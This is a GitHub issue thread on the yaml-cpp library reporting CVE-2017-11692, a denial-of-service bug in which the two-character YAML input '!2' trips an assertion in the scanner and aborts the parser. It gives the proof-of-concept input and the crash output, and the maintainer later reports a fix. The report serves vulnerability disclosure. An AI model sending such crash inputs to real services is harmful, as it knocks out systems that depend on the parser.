### ISSUE TITLE
The assert can lead to dos.

### ISSUE THREAD

**Issue by zhouat** [jbeder/yaml-cpp#519]
The assert [code](https://github.com/jbeder/yaml-cpp/blob/master/src/scanner.cpp#L32) can lead to a dos attack.

Trigger:
```
cat << EOF > file_poc
> !2
> EOF

build/util/parse file_poc
```
crash:
```
parse: /yaml/yaml-cpp/src/scanner.cpp:32: YAML::Token &YAML::Scanner::peek(): Assertion `!m_tokens.empty()' failed.
Aborted

```

**Comment by carnil** [comment]
This issue has been assigned CVE-2017-11692

**Comment by Justinzobel** [comment]
@jbeder can we please see an update on this one also?

**Comment by hobbes1069** [comment]
Ping

**Comment by jbeder** [comment]
Is there a PR you'd like me to review?

**Comment by carnil** [comment]
The issue is still present in abf941b20d21342cd207df0f8ffe09f41a4d3042 FWIW (seen with a Debug build)

**Comment by jbeder** [comment]
Fixed by c9460110e072df84b7dee3eb651f2ec5df75fb18
